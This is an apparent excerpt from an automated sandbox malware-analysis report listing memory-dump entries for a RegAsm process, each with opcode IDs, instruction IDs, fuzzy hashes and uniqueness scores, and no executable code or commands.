                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5963702e65fe12e2407bf5d42d36bee8c75845163ae45f7a3a276db768cf89ea
                                                                                                                                                                              • Instruction ID: 4e90ac759886dfafa4596ab371196efa5e823cc654ac15082038e67faad61132
                                                                                                                                                                              • Opcode Fuzzy Hash: 5963702e65fe12e2407bf5d42d36bee8c75845163ae45f7a3a276db768cf89ea
                                                                                                                                                                              • Instruction Fuzzy Hash: 16F037762041E83F8B514E9A5C10DFB7FEDDA8E561B084156FFD8D2241C43DC961ABB0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 36b114732107ccbb24058685aa7a5d754e0922d30faa1d8803250009a38008e3
                                                                                                                                                                              • Instruction ID: ac5a948777f2e4dd4c8dc9a901136ddd29b67d2ab5e3ce957081662c876c4ebe
                                                                                                                                                                              • Opcode Fuzzy Hash: 36b114732107ccbb24058685aa7a5d754e0922d30faa1d8803250009a38008e3
                                                                                                                                                                              • Instruction Fuzzy Hash: B8F059A13082A11FC322273968240BE3FF5DE8A65230808DBE1C7C7242DA144587C3E1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: fe4f6d45717ae0764573bb45549e71495f0da096c0ca7416c9e5e8713b361712
                                                                                                                                                                              • Instruction ID: 27ef8c7028b6f3badafe2c17061f38a349737a94548c47d75490ee009bc1ca52
                                                                                                                                                                              • Opcode Fuzzy Hash: fe4f6d45717ae0764573bb45549e71495f0da096c0ca7416c9e5e8713b361712
                                                                                                                                                                              • Instruction Fuzzy Hash: 5BF0A771F101195B9F50AA699C49ABF7BE9FB94152708403AE514D3140EB34D80687A1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a55b0b69ff66b0d1346aa52b47d6978f9a810b05c089ab6b6a709a6479697e11
                                                                                                                                                                              • Instruction ID: 556eec492d1a8952f5e518bde2329aa673cadbc283a2b9c85b5dc4a1fdd67311
                                                                                                                                                                              • Opcode Fuzzy Hash: a55b0b69ff66b0d1346aa52b47d6978f9a810b05c089ab6b6a709a6479697e11
                                                                                                                                                                              • Instruction Fuzzy Hash: F2F0CDB4C49259DFDB50DFA4C8582BEBFB0EB5A201F0085E6E40AE7350E3398A41CB40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: b8ab2661ff3788a83b2d2c7908d4aace6b5a5e2657005ecb0879450b30a59c5b
                                                                                                                                                                              • Instruction ID: 98e3e822fd1a6b6046e3ccc9f7a34d4e8bd78aa5bd5963803d0a56d50191da8d
                                                                                                                                                                              • Opcode Fuzzy Hash: b8ab2661ff3788a83b2d2c7908d4aace6b5a5e2657005ecb0879450b30a59c5b
                                                                                                                                                                              • Instruction Fuzzy Hash: 0EF02E71A00701CFDBB6DA61E94077BBFF2AF80315F4888BCE0464AA25DA74E484CB40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 672b01e0f1e54e17c3abf79f85e961352ca2cbeafde30a630e0360baf8a36274
                                                                                                                                                                              • Instruction ID: f4ab31e7812a0a1f04f172fc0b93d802c9ddee9379fdc93efbbf1d2a7323fe7d
                                                                                                                                                                              • Opcode Fuzzy Hash: 672b01e0f1e54e17c3abf79f85e961352ca2cbeafde30a630e0360baf8a36274
                                                                                                                                                                              • Instruction Fuzzy Hash: 0CF082712082E51FC323572868240ED3FB6DF8652570C04DBD585C7243DA140A96C7E9
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 7cee3cfb3266004d694cee090bf0cb4fc7cb030bc902587d7fed5a46608ca595
                                                                                                                                                                              • Instruction ID: 844946be9f9a44411e114dca74e4de6e8a7de4024d1188f692eeb07c335928f3
                                                                                                                                                                              • Opcode Fuzzy Hash: 7cee3cfb3266004d694cee090bf0cb4fc7cb030bc902587d7fed5a46608ca595
                                                                                                                                                                              • Instruction Fuzzy Hash: D9E092312011216FC3106A5AB548A9F7AEAEFC9752F00453DF20ED3242CA75184547B9
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: be1a6135cb46b04de6c608d9585becf432d3b031c2f3cbc979b970b3ca5830af
                                                                                                                                                                              • Instruction ID: 4d688f0346b8bed8fc0b289a18b814880494f4d933d87c2a2d899b56abfefb56
                                                                                                                                                                              • Opcode Fuzzy Hash: be1a6135cb46b04de6c608d9585becf432d3b031c2f3cbc979b970b3ca5830af
                                                                                                                                                                              • Instruction Fuzzy Hash: 18F09034502B01DFD725DF26E448552BBF6FB88305700C62EE58B82A10DF70B589CF84
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 7c1bf9b5542d55830bedf1f4a97aaaef7b356e1af445d237a6376e24c5ff665a
                                                                                                                                                                              • Instruction ID: 3eadfdc42a1f049b6dd1c8726af95ba60aa6a2af3ef9d110c2c2f25471642732
                                                                                                                                                                              • Opcode Fuzzy Hash: 7c1bf9b5542d55830bedf1f4a97aaaef7b356e1af445d237a6376e24c5ff665a
                                                                                                                                                                              • Instruction Fuzzy Hash: 73E012B210D311AFD345DB75AC088A7BBE9EFA5320B16C87EF444C7141EA35D841C769
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 353d4e2ba1170e116d15db099bf3800b3ba6b800db16ffcb3ea625f5cc96d62a
                                                                                                                                                                              • Instruction ID: 980ea50d9920b77d0fd2e23f54b44ea418c05be74acc51e2e72c0035317cb14f
                                                                                                                                                                              • Opcode Fuzzy Hash: 353d4e2ba1170e116d15db099bf3800b3ba6b800db16ffcb3ea625f5cc96d62a
                                                                                                                                                                              • Instruction Fuzzy Hash: 30E0E5302017609FC311EB2DE40979F7BE6DF85315F04092DE24A87602CBA568418791
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 887755cafea5f572b8eb34b3396b38f2dbc83d327085d4793cff0fd7d1740cf8
                                                                                                                                                                              • Instruction ID: 5efb60ef986fe1dfd529524a81680c518b3dfae4a991072aa9c350f261329600
                                                                                                                                                                              • Opcode Fuzzy Hash: 887755cafea5f572b8eb34b3396b38f2dbc83d327085d4793cff0fd7d1740cf8
                                                                                                                                                                              • Instruction Fuzzy Hash: 2FE0DF70106780EFC742EB34F5928553BF0FB43A103051AC6E885DB61EDB609A0687D6
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5ad975bcf768f72f28257c4c53910f07557f0fc821bf268169276f4231bdb117
                                                                                                                                                                              • Instruction ID: a0abde89ebbf84ca3f2e3e031cb8f0714586f6a565f91e19cad571a104dbad18
                                                                                                                                                                              • Opcode Fuzzy Hash: 5ad975bcf768f72f28257c4c53910f07557f0fc821bf268169276f4231bdb117
                                                                                                                                                                              • Instruction Fuzzy Hash: 71E09231106250CFCB11EF28F840A997BE0FF52A10B009A56D0448B65ACA7019458B92
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5f93b0897caf9937d660703c6485afa713a0f9ae0966b9946e64aca930315b3b
                                                                                                                                                                              • Instruction ID: 81cfa2bd2a21b3bc5534d1b1c57797dff5b5f98cf4e769c6fdc1e31912a017c2
                                                                                                                                                                              • Opcode Fuzzy Hash: 5f93b0897caf9937d660703c6485afa713a0f9ae0966b9946e64aca930315b3b
                                                                                                                                                                              • Instruction Fuzzy Hash: E8F0C975D0214DEFCB41DFF4DA498CDBBB5EB48200F1442A6D805E2254E6315B99DB40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 1e08ed805fe01e3c817139901d2ce4902b72975fc8564b603e632161b4747c78
                                                                                                                                                                              • Instruction ID: 64782f2192bef109d50d2ccc80cacf0c4196e7ec92511494ec268016dc63cc53
                                                                                                                                                                              • Opcode Fuzzy Hash: 1e08ed805fe01e3c817139901d2ce4902b72975fc8564b603e632161b4747c78
                                                                                                                                                                              • Instruction Fuzzy Hash: 18E09231009361CFC756B714FD82A453BE1E746B00B012291E4404F5ADC7B41E45CBE7
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: cf735a77fe302c3eace0d2eac83dcd758779695011d8e9424b775bb0e867785d
                                                                                                                                                                              • Instruction ID: 64af7936fe8d6d27d700386f9c107b4a8a6c0f36e063759c88814ea8a7e4c1ed
                                                                                                                                                                              • Opcode Fuzzy Hash: cf735a77fe302c3eace0d2eac83dcd758779695011d8e9424b775bb0e867785d
                                                                                                                                                                              • Instruction Fuzzy Hash: 7CE0D871A05318EFCB01CB64A8005DE3BF1DB42201B2446D7E409D7251E6700F108B52
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a5f07f22593da6bea16d89f49dd9fb39d84b2ca8f94fef106f2d9f224cfccfb1
                                                                                                                                                                              • Instruction ID: e92425479db3919e795617444d9d0f0ac32f8eccddd6fbf3713bea10e0ea6bcc
                                                                                                                                                                              • Opcode Fuzzy Hash: a5f07f22593da6bea16d89f49dd9fb39d84b2ca8f94fef106f2d9f224cfccfb1
                                                                                                                                                                              • Instruction Fuzzy Hash: 1FE0C2356052159FCB29AF7CD460496BBE7EFDA61032A88ABD984C710ACA329C0A8750
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 7fc93fc1c22d1338a851e968c496d2fef8d5f18e50522cd63eca582656a09c87
                                                                                                                                                                              • Instruction ID: c6b478033b33ca647d460f9d93363adb3efcf6a0d22403b4da576d4d99da94c1
                                                                                                                                                                              • Opcode Fuzzy Hash: 7fc93fc1c22d1338a851e968c496d2fef8d5f18e50522cd63eca582656a09c87
                                                                                                                                                                              • Instruction Fuzzy Hash: 3DD05B3130013A6B8615276DB4584AE77FBEFC5672704092AF60BC3340CF651D9647D5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 40d2534af8b661f419562f7cf01876540e9635e3786ef77d26b30af547d547b4
                                                                                                                                                                              • Instruction ID: 98b1da2405046693bda680a43de0ed140f346d9c6c10d1d6c977a6068466736b
                                                                                                                                                                              • Opcode Fuzzy Hash: 40d2534af8b661f419562f7cf01876540e9635e3786ef77d26b30af547d547b4
                                                                                                                                                                              • Instruction Fuzzy Hash: D0E0EC392282449FC712DF68C890C547FB9BF5A61031944CAE5C08B572C231E925DB50
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 371c1d95f13b78dc571926e3d9ce01c426c77b1e09e23420f3277ae95f9fa1b8
                                                                                                                                                                              • Instruction ID: e4ea63b21a4c6a7448da0219892b9ac29398981e934cbacaa5bfa405fee77144
                                                                                                                                                                              • Opcode Fuzzy Hash: 371c1d95f13b78dc571926e3d9ce01c426c77b1e09e23420f3277ae95f9fa1b8
                                                                                                                                                                              • Instruction Fuzzy Hash: FDE07575D0120CFFCB40DFE4D5458DDBBB9EB48200F1082A6D905A3200EA705B559B80
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 67807f35564ee2f43555735fea9400563f6478924a27f6439b1ec7ca92a60175
                                                                                                                                                                              • Instruction ID: 5810c6da6242442793a502023c42ccdf9ff45c5209bb451fb78415cbbeb306cd
                                                                                                                                                                              • Opcode Fuzzy Hash: 67807f35564ee2f43555735fea9400563f6478924a27f6439b1ec7ca92a60175
                                                                                                                                                                              • Instruction Fuzzy Hash: C9D05B71A0120CFFCB40DFA8F90155D77F5DB45205B1046D9D50DE7204DA711F009B91
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: f1c0a2cf1bde83dd965425cf1b0890efa4b0c2f1c383726967907292e2a3374b
                                                                                                                                                                              • Instruction ID: 9b09c94a58ba572d3ffe1d269b4897c9c00d1d03bc773ef07f8816ea21742f6f
                                                                                                                                                                              • Opcode Fuzzy Hash: f1c0a2cf1bde83dd965425cf1b0890efa4b0c2f1c383726967907292e2a3374b
                                                                                                                                                                              • Instruction Fuzzy Hash: 15D012327100204B4654AB5CB01452D76E3D7DC6A3355056FE60ED3344DF718D554785
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5b484db0bd5f568f4c60d0ec03d42f9e251b42b74755b4505972c861d391c733
                                                                                                                                                                              • Instruction ID: 09eb3a04d0ba00f942742c3bceda19942802eef52d3ec93c4a8e74f2a0a1b2a4
                                                                                                                                                                              • Opcode Fuzzy Hash: 5b484db0bd5f568f4c60d0ec03d42f9e251b42b74755b4505972c861d391c733
                                                                                                                                                                              • Instruction Fuzzy Hash: 96C092361002007BEB0096609E0BF967BA5A754B41F1A9014F2896A281EABA9451EEA6
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 9b1a2cdcdcce2cd54bd225540e0b6e6984a14d8a3b63eb985ee3fbdf76609243
                                                                                                                                                                              • Instruction ID: bb19a3df74b25a848247da59b2c38cc230391f5872951009611d2ed9e150557a
                                                                                                                                                                              • Opcode Fuzzy Hash: 9b1a2cdcdcce2cd54bd225540e0b6e6984a14d8a3b63eb985ee3fbdf76609243
                                                                                                                                                                              • Instruction Fuzzy Hash: 5AB09B221CF38459D70609784D05DC13B155B53D1074511DB95819E477D211411F46A3
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: (_^q$(_^q$(_^q$(_^q$(_^q$(_^q
                                                                                                                                                                              • API String ID: 0-2896069617
                                                                                                                                                                              • Opcode ID: 625bd3c04a71123686902ec078839a7d45905d7e05e8c99fd408779cda2645d1
                                                                                                                                                                              • Instruction ID: cfb959669acd3ed3db86b092f7495a893cf254a360a9663c6f67aca149476610
                                                                                                                                                                              • Opcode Fuzzy Hash: 625bd3c04a71123686902ec078839a7d45905d7e05e8c99fd408779cda2645d1
                                                                                                                                                                              • Instruction Fuzzy Hash: 2FD1CE79B052449FCB14AF78C4145AE7FF2FF86300B2485AAE946DB381DA35DE06CB91
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%